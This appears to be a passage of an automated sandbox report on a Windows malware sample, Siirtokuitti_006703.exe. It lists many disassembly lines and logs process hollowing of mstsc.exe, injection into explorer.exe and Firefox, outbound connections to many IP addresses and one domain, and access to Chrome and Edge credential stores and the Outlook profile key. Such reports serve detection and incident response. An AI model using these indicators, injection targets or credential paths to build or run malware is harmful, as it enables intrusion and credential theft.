      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046E9060 mov eax, dword ptr fs:[00000030h]5_2_046E9060
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04646074 mov eax, dword ptr fs:[00000030h]5_2_04646074
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04646074 mov eax, dword ptr fs:[00000030h]5_2_04646074
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04647072 mov eax, dword ptr fs:[00000030h]5_2_04647072
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04670044 mov eax, dword ptr fs:[00000030h]5_2_04670044
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471505B mov eax, dword ptr fs:[00000030h]5_2_0471505B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C6040 mov eax, dword ptr fs:[00000030h]5_2_046C6040
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04641051 mov eax, dword ptr fs:[00000030h]5_2_04641051
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04641051 mov eax, dword ptr fs:[00000030h]5_2_04641051
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463D02D mov eax, dword ptr fs:[00000030h]5_2_0463D02D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04665004 mov eax, dword ptr fs:[00000030h]5_2_04665004
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04665004 mov ecx, dword ptr fs:[00000030h]5_2_04665004
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04648009 mov eax, dword ptr fs:[00000030h]5_2_04648009
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682010 mov ecx, dword ptr fs:[00000030h]5_2_04682010
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463C0F6 mov eax, dword ptr fs:[00000030h]5_2_0463C0F6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467D0F0 mov eax, dword ptr fs:[00000030h]5_2_0467D0F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467D0F0 mov ecx, dword ptr fs:[00000030h]5_2_0467D0F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046390F8 mov eax, dword ptr fs:[00000030h]5_2_046390F8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046390F8 mov eax, dword ptr fs:[00000030h]5_2_046390F8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046390F8 mov eax, dword ptr fs:[00000030h]5_2_046390F8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046390F8 mov eax, dword ptr fs:[00000030h]5_2_046390F8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465B0D0 mov eax, dword ptr fs:[00000030h]5_2_0465B0D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B0D6 mov eax, dword ptr fs:[00000030h]5_2_0463B0D6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B0D6 mov eax, dword ptr fs:[00000030h]5_2_0463B0D6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B0D6 mov eax, dword ptr fs:[00000030h]5_2_0463B0D6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B0D6 mov eax, dword ptr fs:[00000030h]5_2_0463B0D6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FB0AF mov eax, dword ptr fs:[00000030h]5_2_046FB0AF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047150B7 mov eax, dword ptr fs:[00000030h]5_2_047150B7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF0A5 mov eax, dword ptr fs:[00000030h]5_2_046EF0A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF0A5 mov eax, dword ptr fs:[00000030h]5_2_046EF0A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF0A5 mov eax, dword ptr fs:[00000030h]5_2_046EF0A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF0A5 mov eax, dword ptr fs:[00000030h]5_2_046EF0A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF0A5 mov eax, dword ptr fs:[00000030h]5_2_046EF0A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF0A5 mov eax, dword ptr fs:[00000030h]5_2_046EF0A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF0A5 mov eax, dword ptr fs:[00000030h]5_2_046EF0A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C60A0 mov eax, dword ptr fs:[00000030h]5_2_046C60A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C60A0 mov eax, dword ptr fs:[00000030h]5_2_046C60A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C60A0 mov eax, dword ptr fs:[00000030h]5_2_046C60A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C60A0 mov eax, dword ptr fs:[00000030h]5_2_046C60A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C60A0 mov eax, dword ptr fs:[00000030h]5_2_046C60A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C60A0 mov eax, dword ptr fs:[00000030h]5_2_046C60A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C60A0 mov eax, dword ptr fs:[00000030h]5_2_046C60A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046800A5 mov eax, dword ptr fs:[00000030h]5_2_046800A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463A093 mov ecx, dword ptr fs:[00000030h]5_2_0463A093
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714080 mov eax, dword ptr fs:[00000030h]5_2_04714080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714080 mov eax, dword ptr fs:[00000030h]5_2_04714080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714080 mov eax, dword ptr fs:[00000030h]5_2_04714080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714080 mov eax, dword ptr fs:[00000030h]5_2_04714080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714080 mov eax, dword ptr fs:[00000030h]5_2_04714080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714080 mov eax, dword ptr fs:[00000030h]5_2_04714080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714080 mov eax, dword ptr fs:[00000030h]5_2_04714080
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463C090 mov eax, dword ptr fs:[00000030h]5_2_0463C090
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467716D mov eax, dword ptr fs:[00000030h]5_2_0467716D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0469717A mov eax, dword ptr fs:[00000030h]5_2_0469717A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0469717A mov eax, dword ptr fs:[00000030h]5_2_0469717A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04646179 mov eax, dword ptr fs:[00000030h]5_2_04646179
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463A147 mov eax, dword ptr fs:[00000030h]5_2_0463A147
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463A147 mov eax, dword ptr fs:[00000030h]5_2_0463A147
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463A147 mov eax, dword ptr fs:[00000030h]5_2_0463A147
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04713157 mov eax, dword ptr fs:[00000030h]5_2_04713157
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04713157 mov eax, dword ptr fs:[00000030h]5_2_04713157
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04713157 mov eax, dword ptr fs:[00000030h]5_2_04713157
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D314A mov eax, dword ptr fs:[00000030h]5_2_046D314A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D314A mov eax, dword ptr fs:[00000030h]5_2_046D314A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D314A mov eax, dword ptr fs:[00000030h]5_2_046D314A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D314A mov eax, dword ptr fs:[00000030h]5_2_046D314A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04715149 mov eax, dword ptr fs:[00000030h]5_2_04715149
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467415F mov eax, dword ptr fs:[00000030h]5_2_0467415F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04677128 mov eax, dword ptr fs:[00000030h]5_2_04677128
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04677128 mov eax, dword ptr fs:[00000030h]5_2_04677128
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF13E mov eax, dword ptr fs:[00000030h]5_2_046FF13E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CA130 mov eax, dword ptr fs:[00000030h]5_2_046CA130
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466510F mov eax, dword ptr fs:[00000030h]5_2_0466510F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464510D mov eax, dword ptr fs:[00000030h]5_2_0464510D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F113 mov eax, dword ptr fs:[00000030h]5_2_0463F113
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04670118 mov eax, dword ptr fs:[00000030h]5_2_04670118
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046491E5 mov eax, dword ptr fs:[00000030h]5_2_046491E5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046491E5 mov eax, dword ptr fs:[00000030h]5_2_046491E5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E0 mov eax, dword ptr fs:[00000030h]5_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E0 mov eax, dword ptr fs:[00000030h]5_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E0 mov eax, dword ptr fs:[00000030h]5_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E0 mov eax, dword ptr fs:[00000030h]5_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E0 mov eax, dword ptr fs:[00000030h]5_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E0 mov eax, dword ptr fs:[00000030h]5_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466B1E0 mov eax, dword ptr fs:[00000030h]5_2_0466B1E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464A1E3 mov eax, dword ptr fs:[00000030h]5_2_0464A1E3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464A1E3 mov eax, dword ptr fs:[00000030h]5_2_0464A1E3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464A1E3 mov eax, dword ptr fs:[00000030h]5_2_0464A1E3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464A1E3 mov eax, dword ptr fs:[00000030h]5_2_0464A1E3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464A1E3 mov eax, dword ptr fs:[00000030h]5_2_0464A1E3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046381EB mov eax, dword ptr fs:[00000030h]5_2_046381EB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046391F0 mov eax, dword ptr fs:[00000030h]5_2_046391F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046391F0 mov eax, dword ptr fs:[00000030h]5_2_046391F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046501F1 mov eax, dword ptr fs:[00000030h]5_2_046501F1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046501F1 mov eax, dword ptr fs:[00000030h]5_2_046501F1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046501F1 mov eax, dword ptr fs:[00000030h]5_2_046501F1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F1F0 mov eax, dword ptr fs:[00000030h]5_2_0466F1F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F1F0 mov eax, dword ptr fs:[00000030h]5_2_0466F1F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047081EE mov eax, dword ptr fs:[00000030h]5_2_047081EE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047081EE mov eax, dword ptr fs:[00000030h]5_2_047081EE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046501C0 mov eax, dword ptr fs:[00000030h]5_2_046501C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046501C0 mov eax, dword ptr fs:[00000030h]5_2_046501C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046551C0 mov eax, dword ptr fs:[00000030h]5_2_046551C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046551C0 mov eax, dword ptr fs:[00000030h]5_2_046551C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046551C0 mov eax, dword ptr fs:[00000030h]5_2_046551C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046551C0 mov eax, dword ptr fs:[00000030h]5_2_046551C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467E1A4 mov eax, dword ptr fs:[00000030h]5_2_0467E1A4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467E1A4 mov eax, dword ptr fs:[00000030h]5_2_0467E1A4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047151B6 mov eax, dword ptr fs:[00000030h]5_2_047151B6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046731BE mov eax, dword ptr fs:[00000030h]5_2_046731BE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046731BE mov eax, dword ptr fs:[00000030h]5_2_046731BE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046741BB mov ecx, dword ptr fs:[00000030h]5_2_046741BB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046741BB mov eax, dword ptr fs:[00000030h]5_2_046741BB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046741BB mov eax, dword ptr fs:[00000030h]5_2_046741BB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04644180 mov eax, dword ptr fs:[00000030h]5_2_04644180
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04644180 mov eax, dword ptr fs:[00000030h]5_2_04644180
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04644180 mov eax, dword ptr fs:[00000030h]5_2_04644180
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04669194 mov eax, dword ptr fs:[00000030h]5_2_04669194
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681190 mov eax, dword ptr fs:[00000030h]5_2_04681190
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681190 mov eax, dword ptr fs:[00000030h]5_2_04681190
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B273 mov eax, dword ptr fs:[00000030h]5_2_0463B273
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B273 mov eax, dword ptr fs:[00000030h]5_2_0463B273
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B273 mov eax, dword ptr fs:[00000030h]5_2_0463B273
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D327E mov eax, dword ptr fs:[00000030h]5_2_046D327E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D327E mov eax, dword ptr fs:[00000030h]5_2_046D327E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D327E mov eax, dword ptr fs:[00000030h]5_2_046D327E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D327E mov eax, dword ptr fs:[00000030h]5_2_046D327E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D327E mov eax, dword ptr fs:[00000030h]5_2_046D327E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D327E mov eax, dword ptr fs:[00000030h]5_2_046D327E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FD270 mov eax, dword ptr fs:[00000030h]5_2_046FD270
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF247 mov eax, dword ptr fs:[00000030h]5_2_046FF247
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F24A mov eax, dword ptr fs:[00000030h]5_2_0466F24A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BD250 mov eax, dword ptr fs:[00000030h]5_2_046BD250
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BD250 mov ecx, dword ptr fs:[00000030h]5_2_046BD250
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470124C mov eax, dword ptr fs:[00000030h]5_2_0470124C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470124C mov eax, dword ptr fs:[00000030h]5_2_0470124C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470124C mov eax, dword ptr fs:[00000030h]5_2_0470124C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470124C mov eax, dword ptr fs:[00000030h]5_2_0470124C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C0227 mov eax, dword ptr fs:[00000030h]5_2_046C0227
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C0227 mov eax, dword ptr fs:[00000030h]5_2_046C0227
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C0227 mov eax, dword ptr fs:[00000030h]5_2_046C0227
      Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,1_2_00401E43

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 84.32.84.32 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.arifsantoso.info
      Source: C:\Windows\explorer.exeNetwork Connect: 183.90.238.43 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 109.123.121.243 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.214.206.200 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.84.88.108 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 216.108.231.108 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.215.249.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.153.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.104.137.185 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.106.208.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 590000Jump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeSection loaded: unknown target: C:\Users\user\Desktop\Siirtokuitti_006703.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF75FD40000Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF75FD40000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 7528Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 5200Jump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess created: C:\Users\user\Desktop\Siirtokuitti_006703.exe C:\Users\user\Desktop\Siirtokuitti_006703.exeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exeJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403489

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
